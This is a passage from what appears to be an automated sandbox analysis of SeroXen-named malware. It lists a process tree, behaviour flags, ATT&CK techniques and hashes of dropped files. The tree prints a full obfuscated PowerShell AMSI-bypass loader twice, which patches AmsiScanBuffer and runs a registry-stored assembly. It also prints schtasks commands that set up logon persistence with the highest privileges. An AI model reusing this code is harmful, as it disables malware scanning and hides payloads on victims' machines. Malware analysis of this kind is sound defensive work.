har](44)+'N'+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+'Vi'+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$YyfBcEjPtj,$QzBsJmAwXqjXWm).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+'a'+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $ABMciemYnzm.CreateType();}$bIzcLBSmAVXJH=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'st'+[Char](101)+'m'+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+'r'+''+[Char](111)+'s'+'o'+''+'f'+'t'+'.'+''+'W'+''+'i'+''+'n'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+'ns'+[Char](97)+'feN'+[Char](97)+''+'t'+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+'e'+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+'s');$DrMmLFsBKjEDXa=$bIzcLBSmAVXJH.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'P'+'r'+[Char](111)+'c'+[Char](65)+''+'d'+'d'+[Char](114)+'e'+[Char](115)+'s',[Reflection.BindingFlags]('P'+'u'+''+[Char](98)+'l'+'i'+''+[Char](99)+','+[Char](83)+''+'t'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$sxmcVXBTwLjVlHxZBlc=FsUOGqBbrpbu @([String])([IntPtr]);$bKumcuIrEabezisObNqevX=FsUOGqBbrpbu @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$vDILsWIJQAr=$bIzcLBSmAVXJH.GetMethod(''+[Char](71)+'e'+[Char](116)+''+'M'+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+'e'+''+[Char](72)+'an'+'d'+''+[Char](108)+'e').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+''+'n'+''+[Char](101)+''+[Char](108)+'3'+'2'+'.'+'d'+''+'l'+'l')));$BWswcLzGtpLqRC=$DrMmLFsBKjEDXa.Invoke($Null,@([Object]$vDILsWIJQAr,[Object](''+'L'+'o'+[Char](97)+''+[Char](100)+''+'L'+''+'i'+''+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+'y'+[Char](65)+'')));$FgXLDtJywiYKdoRkQ=$DrMmLFsBKjEDXa.Invoke($Null,@([Object]$vDILsWIJQAr,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+'u'+''+'a'+''+[Char](108)+'Pr'+[Char](111)+''+[Char](116)+''+'e'+'c'+[Char](116)+'')));$VNuJqfS=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BWswcLzGtpLqRC,$sxmcVXBTwLjVlHxZBlc).Invoke(''+[Char](97)+''+'m'+'s'+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'');$bglLXgokOiGwTZSPl=$DrMmLFsBKjEDXa.Invoke($Null,@([Object]$VNuJqfS,[Object]('A'+[Char](109)+''+[Char](115)+''+[Char](105)+'S'+'c'+''+'a'+''+[Char](110)+''+'B'+'u'+[Char](102)+''+[Char](102)+'e'+[Char](114)+'')));$ebUwSvRylQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FgXLDtJywiYKdoRkQ,$bKumcuIrEabezisObNqevX).Invoke($bglLXgokOiGwTZSPl,[uint32]8,4,[ref]$ebUwSvRylQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$bglLXgokOiGwTZSPl,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FgXLDtJywiYKdoRkQ,$bKumcuIrEabezisObNqevX).Invoke($bglLXgokOiGwTZSPl,[uint32]8,0x20,[ref]$ebUwSvRylQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+[Char](84)+'WA'+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+'7'+''+[Char](55)+''+[Char](115)+''+[Char](116)+'ag'+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4284

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1788

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:YgoCkAJsGLvB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$nJkTCkwsqezpZA,[Parameter(Position=1)][Type]$tveeIJsHFx)$uqbKHEWMyCX=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+'d'+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+'g'+''+'a'+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+'M'+''+[Char](101)+''+[Char](109)+''+'o'+'r'+'y'+''+'M'+''+'o'+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+'t'+'e'+''+'T'+''+[Char](121)+'p'+[Char](101)+'',''+[Char](67)+''+'l'+''+'a'+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+'i'+'c'+','+''+[Char](83)+''+'e'+''+'a'+''+[Char](108)+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+''+'C'+'l'+[Char](97)+''+'s'+'s,A'+[Char](117)+''+[Char](116)+'o'+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$uqbKHEWMyCX.DefineConstructor('R'+[Char](84)+''+[Char](83)+'p'+[Char](101)+''+[Char](99)+''+[Char](105)+''+'a'+'l'+[Char](78)+''+[Char](97)+'m'+[Char](101)+''+','+''+'H'+''+[Char](105)+''+'d'+''+[Char](101)+'ByS'+'i'+''+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$nJkTCkwsqezpZA).SetImplementationFlags('R'+[Char](117)+'nt'+'i'+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');$uqbKHEWMyCX.DefineMethod('I'+[Char](110)+'v'+[Char](111)+'ke',''+[Char](80)+''+[Char](117)+'bl'+[Char](105)+''+'c'+''+','+''+'H'+'i'+[Char](100)+'e'+[Char](66)+'y'+[Char](83)+''+'i'+''+'g'+''+[Char](44)+'N'+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+'o'+''+[Char](116)+''+[Char](44)+'Vi'+[Char](114)+'t'+[Char](117)+'a'+[Char](108)+'',$tveeIJsHFx,$nJkTCkwsqezpZA).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'ti'+[Char](109)+''+[Char](101)+''+','+'M'+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $uqbKHEWMyCX.CreateType();}$qABWUyOuYgJMe=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+'t'+'e'+'m'+''+[Char](46)+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+'i'+'c'+''+[Char](114)+''+'o'+''+'s'+''+'o'+''+'f'+''+[Char](116)+''+[Char](46)+''+'W'+'i'+[Char](110)+''+[Char](51)+'2'+[Char](46)+'U'+'n'+'s'+'a'+''+[Char](102)+''+'e'+''+'N'+'a'+[Char](116)+'iv'+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+'h'+'o'+''+'d'+''+[Char](115)+'');$XgyGjToEpbAERQ=$qABWUyOuYgJMe.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'Pr'+[Char](111)+''+'c'+'A'+'d'+''+[Char](100)+''+[Char](114)+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'t'+''+[Char](97)+''+'t'+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$CvnhGPaEBKXxqPiXZdJ=YgoCkAJsGLvB @([String])([IntPtr]);$WFfhfepcNKtbpKtcqqYvNX=YgoCkAJsGLvB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$UwiEhgptESY=$qABWUyOuYgJMe.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+'l'+'e'+''+'H'+''+[Char](97)+'nd'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](100)+''+'l'+'l')));$nMFJQkrVeuovZf=$XgyGjToEpbAERQ.Invoke($Null,@([Object]$UwiEhgptESY,[Object](''+'L'+''+[Char](111)+''+'a'+''+'d'+''+'L'+'i'+[Char](98)+''+[Char](114)+''+'a'+''+'r'+''+[Char](121)+''+[Char](65)+'')));$ywsSpHEFAYSwUnMFo=$XgyGjToEpbAERQ.Invoke($Null,@([Object]$UwiEhgptESY,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+'l'+''+[Char](80)+''+'r'+''+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$pnHEUjY=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nMFJQkrVeuovZf,$CvnhGPaEBKXxqPiXZdJ).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+[Char](105)+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'');$KlLhmxkFnKaFhwgtK=$XgyGjToEpbAERQ.Invoke($Null,@([Object]$pnHEUjY,[Object](''+[Char](65)+''+'m'+''+'s'+''+[Char](105)+''+'S'+'c'+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+''+[Char](102)+''+[Char](101)+'r')));$kGbOQoIqvm=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ywsSpHEFAYSwUnMFo,$WFfhfepcNKtbpKtcqqYvNX).Invoke($KlLhmxkFnKaFhwgtK,[uint32]8,4,[ref]$kGbOQoIqvm);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$KlLhmxkFnKaFhwgtK,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ywsSpHEFAYSwUnMFo,$WFfhfepcNKtbpKtcqqYvNX).Invoke($KlLhmxkFnKaFhwgtK,[uint32]8,0x20,[ref]$kGbOQoIqvm);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+[Char](84)+''+'W'+''+'A'+'R'+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+''+[Char](115)+''+[Char](116)+'a'+[Char](103)+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2968

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4276

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1224

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1308

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1332

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1372

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1416

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:2528

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1576

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1596

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1696

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1724

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1772

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1880

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1892

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2008

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2024

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2072

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2164

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2240

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2628

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2668

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2704

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2724

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2812

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3092

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3180

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3428

C:\Users\Admin\AppData\Local\Temp\Uni.exe
"C:\Users\Admin\AppData\Local\Temp\Uni.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1072

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "SeroXen" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.exe" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:4944

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:684

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "SeroXen" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
4⤵
- Creates scheduled task(s)
PID:4904

C:\Users\Admin\AppData\Local\Temp\install.exe
"C:\Users\Admin\AppData\Local\Temp\install.exe"
4⤵
- Executes dropped EXE
PID:1492

C:\Users\Admin\AppData\Local\Temp\install.exe
"C:\Users\Admin\AppData\Local\Temp\install.exe"
3⤵
- Executes dropped EXE
PID:4912

C:\Windows\SysWOW64\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Uni.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Uni.exe'" /sc onlogon /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:4960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3592

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3800

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4000

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4136

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3660

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
1⤵
PID:3168

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4984

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:912

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4920

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3176

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4816

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
- Drops file in System32 directory
PID:984

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:3464

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
1⤵
PID:3012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x2ac,0x7ffadb592e98,0x7ffadb592ea4,0x7ffadb592eb0
2⤵
PID:3876

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2376 --field-trial-handle=2180,i,12780723798465539942,12010519452607841069,262144 --variations-seed-version /prefetch:3
2⤵
PID:3680

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4436 --field-trial-handle=2180,i,12780723798465539942,12010519452607841069,262144 --variations-seed-version /prefetch:8
2⤵
PID:4948

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3640 --field-trial-handle=2180,i,12780723798465539942,12010519452607841069,262144 --variations-seed-version /prefetch:8
2⤵
PID:3420

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:1676

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:864

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
PID:4352

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:2132

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:992

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:3700

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:1216

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:1796

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
fc14d673196f1681ef5eea1ec5ca96f5

SHA1
28e186739717c67edc056ac98976685c08b2f5dd

SHA256
b060939254e9a7f78aa7456b89896000ed2f02872f1098569e1fb759768b37f8

SHA512
bc21d55b6ff77b5923766b62e0a9b22f34328a3fb3cfcff2d56ff6b813c3a8e0d5fba6c728534b894f0b7030e065e248aaf5430948f0c645b41b56b1b98d77a9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
9KB

MD5
79090804b7f62988c161b5fc2fcb4d33

SHA1
2f80bdacbc56c2b8d91bd81b6ae4ca9e3f562a5a

SHA256
c25b53e4bdc7a3514e7bdf1d798731723172d2734f734a319ffd2177a8c10fe8

SHA512
414d683d447e36a96fc7a708e89f7769899600ad2e0b5760faf2837de26056459230f55c63a5cc50a40ae71bb5d044dc752300a033e1ae26e040a21ad00c7f1f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
46KB

MD5
3c13a4f917fe96a7b090a876cefa2d2b

SHA1
17932c74f0ae772627f6d2c5f873fad8df6e3a40

SHA256
6fb13763c76827ec01a59f083fd1239f9fc1aaa3d6e27d6bb5b0db9a7c7951fa

SHA512
130e05569fa9602dec2375123f4f4ee7b11436e305140b7b3af392cd21cced97e223f5862c8540b0c681a06b14d363becf026384f29c7b246a3fe9737e0794d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
46KB

MD5
e1b33fff1e3b92839ef51d887cac5e93

SHA1
3b338cb7734dd9b100f1d583c48e47121aa9bbc6

SHA256
bee4ad7f845a1ea065b90892650b2480fee0ac3c7bdfc86d5fb57ddb736f6aff

SHA512
c967f4245613dce4f8a7d8a89ecaf2750ded4c8aed99257477948bd383a78d416bca45c48c2859aa5d98091001f3b706d4fceb918b9f6700eff93d5ba83d79c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\install.exe

Filesize
162KB

MD5
152e3f07bbaf88fb8b097ba05a60df6e

SHA1
c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

SHA256
a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

SHA512
2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

Download Submit
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

Filesize
409KB

MD5
4c2bb0618a6eda615c8001d5a7ccd6c0

SHA1
c88d2c8bfc5906a5cfef78893d1132edcffd71f0

SHA256
abcda524c02f9381d8d43f9ec0079d854db821d77f45e88f50606f46871f81d6

SHA512
6abe53339656a023e2a0547f1c2249789c33091d67a21f2e689c6411dc5357e34ec3c65634b6f6955a5023d20803f7c746b13f574bcd84b008abb4a97ea61027

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

Filesize
2KB

MD5
f313c5b4f95605026428425586317353

SHA1
06be66fa06e1cffc54459c38d3d258f46669d01a

SHA256
129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

SHA512
b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

Filesize
2KB

MD5
ceb7caa4e9c4b8d760dbf7e9e5ca44c5

SHA1
a3879621f9493414d497ea6d70fbf17e283d5c08

SHA256
98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

SHA512
1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

Filesize
2KB

MD5
7d612892b20e70250dbd00d0cdd4f09b

SHA1
63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

SHA256
727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

SHA512
f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

Filesize
2KB

MD5
1e8e2076314d54dd72e7ee09ff8a52ab

SHA1
5fd0a67671430f66237f483eef39ff599b892272

SHA256
55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

SHA512
5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

Filesize
2KB

MD5
0b990e24f1e839462c0ac35fef1d119e

SHA1
9e17905f8f68f9ce0a2024d57b537aa8b39c6708

SHA256
a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

SHA512
c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

Download Submit
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Filesize
290B

MD5
ecdeaea174a2589423d54c76b288d499

SHA1
ff53a216ab732f858cc0cd024ef82250c071c235

SHA256
